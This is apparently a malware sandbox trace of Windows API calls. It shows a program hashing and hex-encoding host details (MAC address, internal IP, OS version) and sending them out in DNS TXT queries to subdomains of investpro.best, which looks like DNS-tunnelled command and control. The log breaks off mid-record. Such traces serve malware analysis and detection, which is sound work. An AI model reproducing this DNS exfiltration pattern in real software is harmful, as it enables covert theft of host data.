WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="7719009AE6838A31C8282C804263C85C", cchWideChar=32, lpMultiByteStr=0x300000, cbMultiByte=66, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="7719009AE6838A31C8282C804263C85C", lpUsedDefaultChar=0x0) returned 32 [0270.233] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x69da78 [0270.233] VirtualFree (lpAddress=0x300000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0270.233] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x69d390 | out: hHeap=0x680000) returned 1 [0270.233] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x69d390 [0270.233] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x69da78 | out: hHeap=0x680000) returned 1 [0270.233] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x69d2c8, cbMultiByte=57, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 57 [0270.233] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x69dd50 [0270.233] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x69d2c8, cbMultiByte=57, lpWideCharStr=0x69dd50, cchWideChar=57 | out: lpWideCharStr="aETAdzjz@@001c5a16c7c1@@192.168.0.211@@Windows 7@@YKYD69Q") returned 57 [0270.234] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6a5940 [0270.234] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x695ee0 [0270.234] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6a81d0 [0270.234] VirtualAlloc (lpAddress=0x0, dwSize=0x74, flAllocationType=0x3000, flProtect=0x4) returned 0x300000 [0270.234] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="aETAdzjz@@001c5a16c7c1@@192.168.0.211@@Windows 7@@YKYD69Q", cchWideChar=57, lpMultiByteStr=0x300000, cbMultiByte=116, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="aETAdzjz@@001c5a16c7c1@@192.168.0.211@@Windows 7@@YKYD69Q", lpUsedDefaultChar=0x0) returned 57 [0270.234] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x695f28 [0270.234] VirtualFree (lpAddress=0x300000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0270.234] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6a81d0 | out: hHeap=0x680000) returned 1 [0270.235] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x6a7a48 [0270.235] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x6a7a58 [0270.235] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x6a5c40 [0270.235] GetLastError () returned 0x0 [0270.235] SetLastError (dwErrCode=0x0) [0270.235] GetLastError () returned 0x0 [0270.235] SetLastError (dwErrCode=0x0) [0270.235] GetLastError () returned 0x0 [0270.235] SetLastError (dwErrCode=0x0) [0270.236] GetLastError () returned 0x0 [0270.236] SetLastError (dwErrCode=0x0) [0270.236] GetLastError () returned 0x0 [0270.236] SetLastError (dwErrCode=0x0) [0270.236] GetLastError () returned 0x0 [0270.236] SetLastError (dwErrCode=0x0) [0270.236] GetLastError () returned 0x0 [0270.236] SetLastError (dwErrCode=0x0) [0270.237] GetLastError () returned 0x0 [0270.237] SetLastError (dwErrCode=0x0) [0270.237] GetLastError () returned 0x0 [0270.237] SetLastError (dwErrCode=0x0) [0270.237] GetLastError () returned 0x0 [0270.237] SetLastError (dwErrCode=0x0) [0270.237] GetLastError () returned 0x0 [0270.237] SetLastError (dwErrCode=0x0) [0270.238] GetLastError () returned 0x0 [0270.238] SetLastError (dwErrCode=0x0) [0270.238] GetLastError () returned 0x0 [0270.238] SetLastError (dwErrCode=0x0) [0270.238] GetLastError () returned 0x0 [0270.238] SetLastError (dwErrCode=0x0) [0270.238] GetLastError () returned 0x0 [0270.238] SetLastError (dwErrCode=0x0) [0270.239] GetLastError () returned 0x0 [0270.239] SetLastError (dwErrCode=0x0) [0270.239] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x695f70 [0270.239] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6a5c40 | out: hHeap=0x680000) returned 1 [0270.239] GetLastError () returned 0x0 [0270.239] SetLastError (dwErrCode=0x0) [0270.239] GetLastError () returned 0x0 [0270.239] SetLastError (dwErrCode=0x0) [0270.239] GetLastError () returned 0x0 [0270.239] SetLastError (dwErrCode=0x0) [0270.240] GetLastError () returned 0x0 [0270.240] SetLastError (dwErrCode=0x0) [0270.240] GetLastError () returned 0x0 [0270.240] SetLastError (dwErrCode=0x0) [0270.240] GetLastError () returned 0x0 [0270.240] SetLastError (dwErrCode=0x0) [0270.240] GetLastError () returned 0x0 [0270.240] SetLastError (dwErrCode=0x0) [0270.241] GetLastError () returned 0x0 [0270.241] SetLastError (dwErrCode=0x0) [0270.241] GetLastError () returned 0x0 [0270.241] SetLastError (dwErrCode=0x0) [0270.241] GetLastError () returned 0x0 [0270.241] SetLastError (dwErrCode=0x0) [0270.241] GetLastError () returned 0x0 [0270.241] SetLastError (dwErrCode=0x0) [0270.241] GetLastError () returned 0x0 [0270.242] SetLastError (dwErrCode=0x0) [0270.242] GetLastError () returned 0x0 [0270.242] SetLastError (dwErrCode=0x0) [0270.242] GetLastError () returned 0x0 [0270.242] SetLastError (dwErrCode=0x0) [0270.242] GetLastError () returned 0x0 [0270.242] SetLastError (dwErrCode=0x0) [0270.242] GetLastError () returned 0x0 [0270.242] SetLastError (dwErrCode=0x0) [0270.243] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x6a81d0 [0270.243] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x695f70 | out: hHeap=0x680000) returned 1 [0270.243] GetLastError () returned 0x0 [0270.243] SetLastError (dwErrCode=0x0) [0270.243] GetLastError () returned 0x0 [0270.243] SetLastError (dwErrCode=0x0) [0270.243] GetLastError () returned 0x0 [0270.243] SetLastError (dwErrCode=0x0) [0270.243] GetLastError () returned 0x0 [0270.244] SetLastError (dwErrCode=0x0) [0270.244] GetLastError () returned 0x0 [0270.244] SetLastError (dwErrCode=0x0) [0270.244] GetLastError () returned 0x0 [0270.244] SetLastError (dwErrCode=0x0) [0270.244] GetLastError () returned 0x0 [0270.244] SetLastError (dwErrCode=0x0) [0270.244] GetLastError () returned 0x0 [0270.244] SetLastError (dwErrCode=0x0) [0270.245] GetLastError () returned 0x0 [0270.245] SetLastError (dwErrCode=0x0) [0270.245] GetLastError () returned 0x0 [0270.245] SetLastError (dwErrCode=0x0) [0270.245] GetLastError () returned 0x0 [0270.245] SetLastError (dwErrCode=0x0) [0270.245] GetLastError () returned 0x0 [0270.245] SetLastError (dwErrCode=0x0) [0270.246] GetLastError () returned 0x0 [0270.246] SetLastError (dwErrCode=0x0) [0270.246] GetLastError () returned 0x0 [0270.246] SetLastError (dwErrCode=0x0) [0270.246] GetLastError () returned 0x0 [0270.246] SetLastError (dwErrCode=0x0) [0270.246] GetLastError () returned 0x0 [0270.246] SetLastError (dwErrCode=0x0) [0270.247] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x90) returned 0x6a8238 [0270.247] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6a81d0 | out: hHeap=0x680000) returned 1 [0270.247] GetLastError () returned 0x0 [0270.247] SetLastError (dwErrCode=0x0) [0270.247] GetLastError () returned 0x0 [0270.247] SetLastError (dwErrCode=0x0) [0270.247] GetLastError () returned 0x0 [0270.247] SetLastError (dwErrCode=0x0) [0270.247] GetLastError () returned 0x0 [0270.247] SetLastError (dwErrCode=0x0) [0270.248] GetLastError () returned 0x0 [0270.248] SetLastError (dwErrCode=0x0) [0270.248] GetLastError () returned 0x0 [0270.248] SetLastError (dwErrCode=0x0) [0270.248] GetLastError () returned 0x0 [0270.248] SetLastError (dwErrCode=0x0) [0270.248] GetLastError () returned 0x0 [0270.248] SetLastError (dwErrCode=0x0) [0270.248] GetLastError () returned 0x0 [0270.249] SetLastError (dwErrCode=0x0) [0270.249] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6a82d0 [0270.249] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6a8238 | out: hHeap=0x680000) returned 1 [0270.249] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6a7a58 | out: hHeap=0x680000) returned 1 [0270.249] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6a7a48 | out: hHeap=0x680000) returned 1 [0270.249] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6a81d0 [0270.249] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x695f70 [0270.249] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x69c320 [0270.249] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x695fb8 [0270.249] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x69da78 [0270.249] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x69c320 | out: hHeap=0x680000) returned 1 [0270.249] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x6a5c40 [0270.249] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x48) returned 0x6a59c8 [0270.249] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x69da78 | out: hHeap=0x680000) returned 1 [0270.249] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x48) returned 0x6a8258 [0270.249] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x696000 [0270.249] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x696048 [0270.249] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x6a5c68 [0270.249] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6a81d0 | out: hHeap=0x680000) returned 1 [0270.249] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6a82d0 | out: hHeap=0x680000) returned 1 [0270.249] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x695f28 | out: hHeap=0x680000) returned 1 [0270.249] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x696000 | out: hHeap=0x680000) returned 1 [0270.249] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x696048 | out: hHeap=0x680000) returned 1 [0270.249] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6a5c68 | out: hHeap=0x680000) returned 1 [0270.249] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6a8258 | out: hHeap=0x680000) returned 1 [0270.250] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x4) returned 0x300000 [0270.250] VirtualAlloc (lpAddress=0x0, dwSize=0x39, flAllocationType=0x3000, flProtect=0x4) returned 0x310000 [0270.250] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x4) returned 0x320000 [0270.250] BCryptOpenAlgorithmProvider (in: phAlgorithm=0x2df7ac, pszAlgId="SHA1", pszImplementation=0x0, dwFlags=0x0 | out: phAlgorithm=0x2df7ac) returned 0x0 [0270.251] BCryptGetProperty (in: hObject=0x6a82b8, pszProperty="ObjectLength", pbOutput=0x2df7a4, cbOutput=0x4, pcbResult=0x2df7a0, dwFlags=0x0 | out: pbOutput=0x2df7a4, pcbResult=0x2df7a0) returned 0x0 [0270.251] VirtualAlloc (lpAddress=0x0, dwSize=0xa6, flAllocationType=0x3000, flProtect=0x4) returned 0x330000 [0270.251] BCryptGetProperty (in: hObject=0x6a82b8, pszProperty="HashDigestLength", pbOutput=0x2df7dc, cbOutput=0x4, pcbResult=0x2df7a0, dwFlags=0x0 | out: pbOutput=0x2df7dc, pcbResult=0x2df7a0) returned 0x0 [0270.251] BCryptCreateHash (in: hAlgorithm=0x6a82b8, phHash=0x2df7a8, pbHashObject=0x330000, cbHashObject=0xa6, pbSecret=0x0, cbSecret=0x0, dwFlags=0x0 | out: hAlgorithm=0x6a82b8, phHash=0x2df7a8, pbHashObject=0x330000) returned 0x0 [0270.251] BCryptHashData (in: hHash=0x330000, pbInput=0x310000, cbInput=0x39, dwFlags=0x0 | out: hHash=0x330000) returned 0x0 [0270.252] BCryptFinishHash (in: hHash=0x330000, pbOutput=0x300000, cbOutput=0x14, dwFlags=0x0 | out: hHash=0x330000, pbOutput=0x300000) returned 0x0 [0270.252] BCryptDestroyHash (in: hHash=0x330000 | out: hHash=0x330000) returned 0x0 [0270.252] VirtualFree (lpAddress=0x330000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0270.252] BCryptCloseAlgorithmProvider (in: hAlgorithm=0x6a82b8, dwFlags=0x0 | out: hAlgorithm=0x6a82b8) returned 0x0 [0270.252] VirtualAlloc (lpAddress=0x0, dwSize=0x2a, flAllocationType=0x3000, flProtect=0x4) returned 0x330000 [0270.252] wsprintfW (in: param_1=0x330000, param_2="%2.2X" | out: param_1="66") returned 2 [0270.252] wsprintfW (in: param_1=0x330004, param_2="%2.2X" | out: param_1="B9") returned 2 [0270.252] wsprintfW (in: param_1=0x330008, param_2="%2.2X" | out: param_1="E6") returned 2 [0270.252] wsprintfW (in: param_1=0x33000c, param_2="%2.2X" | out: param_1="E5") returned 2 [0270.252] wsprintfW (in: param_1=0x330010, param_2="%2.2X" | out: param_1="B9") returned 2 [0270.252] wsprintfW (in: param_1=0x330014, param_2="%2.2X" | out: param_1="F9") returned 2 [0270.252] wsprintfW (in: param_1=0x330018, param_2="%2.2X" | out: param_1="90") returned 2 [0270.252] wsprintfW (in: param_1=0x33001c, param_2="%2.2X" | out: param_1="2C") returned 2 [0270.252] wsprintfW (in: param_1=0x330020, param_2="%2.2X" | out: param_1="B4") returned 2 [0270.252] wsprintfW (in: param_1=0x330024, param_2="%2.2X" | out: param_1="11") returned 2 [0270.252] wsprintfW (in: param_1=0x330028, param_2="%2.2X" | out: param_1="FB") returned 2 [0270.252] wsprintfW (in: param_1=0x33002c, param_2="%2.2X" | out: param_1="14") returned 2 [0270.252] wsprintfW (in: param_1=0x330030, param_2="%2.2X" | out: param_1="9C") returned 2 [0270.253] wsprintfW (in: param_1=0x330034, param_2="%2.2X" | out: param_1="3A") returned 2 [0270.253] wsprintfW (in: param_1=0x330038, param_2="%2.2X" | out: param_1="77") returned 2 [0270.253] wsprintfW (in: param_1=0x33003c, param_2="%2.2X" | out: param_1="FF") returned 2 [0270.253] wsprintfW (in: param_1=0x330040, param_2="%2.2X" | out: param_1="BA") returned 2 [0270.253] wsprintfW (in: param_1=0x330044, param_2="%2.2X" | out: param_1="AD") returned 2 [0270.253] wsprintfW (in: param_1=0x330048, param_2="%2.2X" | out: param_1="D8") returned 2 [0270.253] wsprintfW (in: param_1=0x33004c, param_2="%2.2X" | out: param_1="28") returned 2 [0270.253] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x6a81d0 [0270.253] VirtualAlloc (lpAddress=0x0, dwSize=0x52, flAllocationType=0x3000, flProtect=0x4) returned 0x340000 [0270.253] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="66B9E6E5B9F9902CB411FB149C3A77FFBAADD828", cchWideChar=40, lpMultiByteStr=0x340000, cbMultiByte=82, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="66B9E6E5B9F9902CB411FB149C3A77FFBAADD828", lpUsedDefaultChar=0x0) returned 40 [0270.253] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x69da78 [0270.253] VirtualFree (lpAddress=0x340000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0270.253] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6a81d0 | out: hHeap=0x680000) returned 1 [0270.253] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x69d3c8 [0270.253] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x47) returned 0x6a81d0 [0270.253] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x69d3c8 | out: hHeap=0x680000) returned 1 [0270.253] VirtualFree (lpAddress=0x300000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0270.253] VirtualFree (lpAddress=0x310000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0270.254] VirtualFree (lpAddress=0x320000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0270.254] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x69da78 | out: hHeap=0x680000) returned 1 [0270.254] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x69da78 [0270.254] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x47) returned 0x6a8220 [0270.254] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x69da78 | out: hHeap=0x680000) returned 1 [0270.254] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x6a7a48 [0270.254] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x6a7a58 [0270.254] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x6a5c68 [0270.254] GetLastError () returned 0x0 [0270.254] SetLastError (dwErrCode=0x0) [0270.254] GetLastError () returned 0x0 [0270.254] SetLastError (dwErrCode=0x0) [0270.255] GetLastError () returned 0x0 [0270.255] SetLastError (dwErrCode=0x0) [0270.255] GetLastError () returned 0x0 [0270.255] SetLastError (dwErrCode=0x0) [0270.255] GetLastError () returned 0x0 [0270.255] SetLastError (dwErrCode=0x0) [0270.255] GetLastError () returned 0x0 [0270.255] SetLastError (dwErrCode=0x0) [0270.255] GetLastError () returned 0x0 [0270.255] SetLastError (dwErrCode=0x0) [0270.256] GetLastError () returned 0x0 [0270.256] SetLastError (dwErrCode=0x0) [0270.256] GetLastError () returned 0x0 [0270.256] SetLastError (dwErrCode=0x0) [0270.256] GetLastError () returned 0x0 [0270.256] SetLastError (dwErrCode=0x0) [0270.256] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x6a5c90 [0270.256] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6a5c68 | out: hHeap=0x680000) returned 1 [0270.256] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6a7a58 | out: hHeap=0x680000) returned 1 [0270.256] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6a7a48 | out: hHeap=0x680000) returned 1 [0270.256] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x6a5c68 [0270.256] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x6a5cb8 [0270.256] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x696048 [0270.256] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6a5cb8 | out: hHeap=0x680000) returned 1 [0270.256] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6a5c68 | out: hHeap=0x680000) returned 1 [0270.256] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6a5c90 | out: hHeap=0x680000) returned 1 [0270.256] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x696000 [0270.256] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x695f28 [0270.256] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x696090 [0270.257] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x6960d8 [0270.257] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x696120 [0270.257] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x6a5c90 [0270.257] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x6a5c68 [0270.257] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x696168 [0270.257] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x6a5cb8 [0270.257] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x6961b0 [0270.257] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x6a5ce0 [0270.257] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x6961f8 [0270.257] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x6a5d08 [0270.257] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x696240 [0270.257] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x6a5d30 [0270.257] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x696288 [0270.257] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x6a5d58 [0270.257] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x6a5d80 [0270.257] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x6a5da8 [0270.257] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x6962d0 [0270.257] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x696120 | out: hHeap=0x680000) returned 1 [0270.257] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6960d8 | out: hHeap=0x680000) returned 1 [0270.257] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x696090 | out: hHeap=0x680000) returned 1 [0270.257] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x695f28 | out: hHeap=0x680000) returned 1 [0270.257] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x69b630 | out: hHeap=0x680000) returned 1 [0270.257] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x695f28 [0270.257] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x696090 [0270.257] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x5f) returned 0x6a8270 [0270.257] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x696090 | out: hHeap=0x680000) returned 1 [0270.257] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x50) returned 0x6a82d8 [0270.257] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x6a7a48 [0270.257] DnsQuery_A (in: pszName="00005-7719009AE6838A31C8282C804263C85C000000000000063q-c8pf60.investpro.best", wType=0x10, Options=0x8, pExtra=0x0, ppQueryResults=0x6a7a48, pReserved=0x0 | out: pExtra=0x0, ppQueryResults=0x6a7a48*(pNext=0x0, pName="00005-7719009AE6838A31C8282C804263C85C000000000000063q-c8pf60.investpro.best", wType=0x10, wDataLength=0xc, Flags=0x3019, dwTtl=0x0, dwReserved=0x1, Data=0x1814c8*(dwStringCount=0x1, pStringArray="LTE=")), pReserved=0x0) returned 0x0 [0273.098] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x6a6230 [0273.098] Sleep (dwMilliseconds=0x3e8) [0274.103] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6a82d8 | out: hHeap=0x680000) returned 1 [0274.103] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x695f28 | out: hHeap=0x680000) returned 1 [0274.103] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x695f28 [0274.103] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x696120 [0274.103] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x5f) returned 0x6a4280 [0274.103] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x696120 | out: hHeap=0x680000) returned 1 [0274.103] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6a8270 | out: hHeap=0x680000) returned 1 [0274.103] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x50) returned 0x6a8270 [0274.104] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x6a7b18 [0274.104] DnsQuery_A (in: pszName="0001336576687862616a6569000000000000000000000000000e2w-c8pf60.investpro.best", wType=0x10, Options=0x8, pExtra=0x0, ppQueryResults=0x6a7b18, pReserved=0x0 | out: pExtra=0x0, ppQueryResults=0x6a7b18*(pNext=0x0, pName="0001336576687862616a6569000000000000000000000000000e2w-c8pf60.investpro.best", wType=0x10, wDataLength=0xc, Flags=0x3019, dwTtl=0x0, dwReserved=0x1, Data=0x181618*(dwStringCount=0x1, pStringArray="lordlordlordlord")), pReserved=0x0) returned 0x0 [0274.182] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x6a6258 [0274.182] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x6a45c0 [0274.182] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x6a45e8 [0274.182] Sleep (dwMilliseconds=0x3e8) [0275.195] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6a6258 | out: hHeap=0x680000) returned 1 [0275.196] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6a8270 | out: hHeap=0x680000) returned 1 [0275.196] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x695f28 | out: hHeap=0x680000) returned 1 [0275.196] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x695f28 [0275.196] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x696120 [0275.196] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x5f) returned 0x6a8620 [0275.196] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x696120 | out: hHeap=0x680000) returned 1 [0275.196] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6a4280 | out: hHeap=0x680000) returned 1 [0275.196] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x50) returned 0x6a4280 [0275.196] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x6a7b28 [0275.196] DnsQuery_A (in: pszName="000266B9E6E5B9F9902CB411FB149C3A77FFBAADD8280jf-c8pf60.investpro.best", wType=0x10, Options=0x8, pExtra=0x0, ppQueryResults=0x6a7b28, pReserved=0x0 | out: pExtra=0x0, ppQueryResults=0x6a7b28*(pNext=0x0, pName="000266B9E6E5B9F9902CB411FB149C3A77FFBAADD8280jf-c8pf60.investpro.best", wType=0x10, wDataLength=0xc, Flags=0x3019, dwTtl=0x0, dwReserved=0x1, Data=0x181be8*(dwStringCount=0x1, pStringArray="lordlordlordlord")), pReserved=0x0) returned 0x0 [0275.274] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x6a6258 [0275.274] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x6a4610 [0275.275] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x6a4638 [0275.275] Sleep (dwMilliseconds=0x3e8) [0276.334] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6a6258 | out: hHeap=0x680000) returned 1 [0276.334] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6a4280 | out: hHeap=0x680000) returned 1 [0276.334] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x695f28 | out: hHeap=0x680000) returned 1 [0276.334] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x695f28 [0276.334] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x696120 [0276.334] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x5f) returned 0x6aaf78 [0276.334] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x696120 | out: hHeap=0x680000) returned 1 [0276.334] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6a8620 | out: hHeap=0x680000) returned 1 [0276.334] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x50) returned 0x6a8620 [0276.334] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x6a7b38 [0276.335] DnsQuery_A (in: pszName="000361455441647a6a7a404030303163356131366337633140403hsb-c8pf60.investpro.best", wType=0x10, Options=0x8, pExtra=0x0, ppQueryResults=0x6a7b38, pReserved=0x0 | out: pExtra=0x0, 